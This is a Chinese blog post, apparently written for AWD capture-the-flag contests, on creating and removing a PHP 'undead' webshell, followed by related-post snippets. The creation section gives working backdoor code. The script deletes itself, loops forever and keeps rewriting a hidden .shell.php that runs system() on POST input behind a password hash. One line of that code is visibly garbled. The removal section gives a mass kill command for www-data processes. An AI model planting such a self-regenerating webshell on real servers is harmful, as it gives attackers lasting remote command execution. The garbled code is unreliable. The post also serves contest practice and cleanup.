渗透测试-不死马的创建和查杀

已于 2023-01-20 10:27:38 修改
阅读量2.4k 收藏 14
点赞数
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-09-01 13:57:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126638536
版权

不死马的创建和查杀

文章目录

0x00 创建

md5加密密码:

在这里插入图片描述

代码:

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e424b5e91"){@system($_POST[cmd]);} ?>';

while (1){
file_put_contents( f i l e , file, file,code);
}
?>

触发执行:
在这里插入图片描述

0x01 查看

权限:在这里插入图片描述
内容:在这里插入图片描述
执行:在这里插入图片描述

0x02 查杀

root用户角度的查杀:

1、杀掉进程

ps aux | grep www-data | awk ‘{print $2}’ | xargs kill -9
2、重启服务

重启web服务。

其他用户的查杀:

在awd中,ctf用户没有权限,不能重启服务,而且,以ctf的用户来杀进程和条件竞争也是不可行的。

(不死马会先创建,然后被删除,在创建到被删除的过程中会可利用。)

最简单的方式就是以www-data用户的角度通过杀进程来实现查杀。

1、杀掉进程:

<?php @system("ps -aux | grep www-data | awk '{print $2}' | xargs kill -9"); ?>

2、条件竞争:
不推荐,如果不死马中没有调用usleep()函数,进行延时的话,条件竞争是gg的。

炫彩@之星
关注
专栏目录
不死马php如何取证_awd的防御脚本以及查杀不死马测试
weixin_39682944的博客
01-12 1123
防御脚本github上的awd通防脚本三个。一个记录敏感请求,一个记录所有的东西。一个是waf,针对sql注入的。wafjk.phpwafjk.php是用来记录敏感操作的,可以自行修改pattern,增加更多的敏感函数,只要匹配到,就会记录下来敏感操作。首先我在index.php包含了include "wafjk.php";...
AWD-----监控&不死马&垃圾包&资源库
qi_SJQ_的博客
02-27 4410
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用 分析有后门或无后门的攻击行为数据包找到漏洞进行修复 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍 安恒的awf部署比较麻烦,比赛时系统日志不太好用,因此用日志分析监控的脚本好,可以实时生成日志。 推荐项目:AWD_Hunter-master 3.攻击-----
Web
打酱油的杯具的博客
03-07 278
Web 文章目录WebburpsuitProxy模块Intruder模块decode模块一句话木**eval和assert函数****木变形**木使用木的特征与查杀不死马(内存)菜刀蚁剑使用 感谢nepnep,以下大部分为师傅整理的PPT上的内容,加上一部自己的整理 burpsuit Proxy模块 http报文 第一行GET表示请求方式 第二行HOST表示请求的域名或者ip 第三行User-Agent表示访问者的浏览器以及系统版本 第七行Referer表示从哪个页面跳转而来 报文头与报文主体
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
在AWD比赛中防御不死马
最新发布
2301_76819732的博客
09-29 812
最近参加一个一次线下的AWD比赛,第一次参加,被打散架了,一开始没堵住后门,几分钟的时间就全是不死马了,连备份下来的文件都是不死马了,杀手段准备了一些,但是没想到有这么多,根本杀不完。今天反思了 一下,写了几个简单的关于反制不死马的脚本。
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 2073
关于PHP不死马的分析和总结
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1851
ctf awd知识分享(常用命令,不死马,waf,文件监控)
linux基础知识
Chen_Sir____的博客
11-11 216
命令解析器: shell – unix操作系统 bash – Linux操作系统 本质:根据命令的名字,调用对应的可执行程序 Linux快捷键 date:时间 history:历史(ctrl+p=在历史记录中一条一条向上切换 ctrl+n=在历史记录中一条一条向下切换) 光标移动:往回=ctrl+b 往后=ctrl+f 行首=ctrl+a 行尾=ctrl+e 行中字符删除操作:光标前=ctrl+h 光标后=ctrl+d(光标后即光标覆盖的字符) 行中光标前所有字符操作:光标前=ctrl+u 自动填充命令:
渗透测试-木免杀的几种方式
MSB_WLAQ的博客
09-28 4866
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木免于被杀毒软件查杀的软件。它除了使病毒木免于被查杀外,还可以扩增病毒木的功能,改变病毒木的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
网络安全-疱丁解-木查杀深度剖析
09-27
《庖丁解-木查杀深度剖析》围绕木查杀展开,为读者提供了全面且深入的知识。 一、基础概念与原理 木知识扫盲 介绍计算机基本组成,如 CPU、内存、磁盘等,以及程序、进程、自启动程序和注册表等概念,为...
webshell不死僵尸大
10-06
webshell不死僵尸大(去后门本人专用)
行业资料-交通装置-一种木查杀工具.zip
08-31
行业资料-交通装置-一种木查杀工具.zip
不死马php如何取证_干掉 PHP 不死马
weixin_39880621的博客
01-30 926
在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.什么是不死马先说一下什么是不死马, 比如这种12345678910set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = "";file_put_contents(".shell.php", $c...
PHP不死马
qq_50822277的博客
07-22 327
php不死马,下面只是基础不死马。可以根据自己要求自行更改和改进。缺点:重启服务,即可删除,但是灵活性高。
php不死马如何kill,awd攻防之kill 不死马
weixin_33278577的博客
03-22 1804
1.pwn题目题目预设条件:官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口,并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成:sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注:后面的ga...
7.awd不死马权限维持及变种
山兔的博客
09-22 2700
不死马又叫内存,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。 不死马.php—>上传到server—>server执行文件—>server本地无限循环生成 (一句话.php) 不死马生成的一句话木可以自定义。 <?php ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行 set_time_limit(0); //设置脚本的最大执行时间,0代表无限制 unlink(__FILE__); //删除文件本身
如何删除不死马
黑锤的博客
11-25 5445
当自己的服务器被别人上传了不死马,如何应对呢? 第一个方法就是,重启自己的服务,这样不死马就没有了,就不会再生成了,毕竟不死马是在内存当中的。 第二种方法就是用命令将在内存中的进程删除; kill -9 -1 这个命令可以杀掉当前用户下面的所有进程,当然就可以把不死马杀掉。 可以使用 ps aux 命令 列出所有进程,找到要杀掉的进程运用命令: kill pid 就可以了 可以使用...
不死马
strider1123的博客
08-01 252
不死马感觉挺有用的,先了解了解,早晚会用到 先来了解下不死马不死”的原理 不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木文件 来看一个普通的不死马 <?php set_time_limit(0); //用来让这个php文件能永久执行,否则会有...
如何查杀php不死马
09-29
5. **更新和补丁**:确保所有使用的 PHP 和关联库都保持最新,因为新版本通常修复了已知的安全漏洞,这可能导致不死马利用的漏洞。 6. **清理代码**:如果已经发现恶意代码,删除或注释掉相关的部分,并检查其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值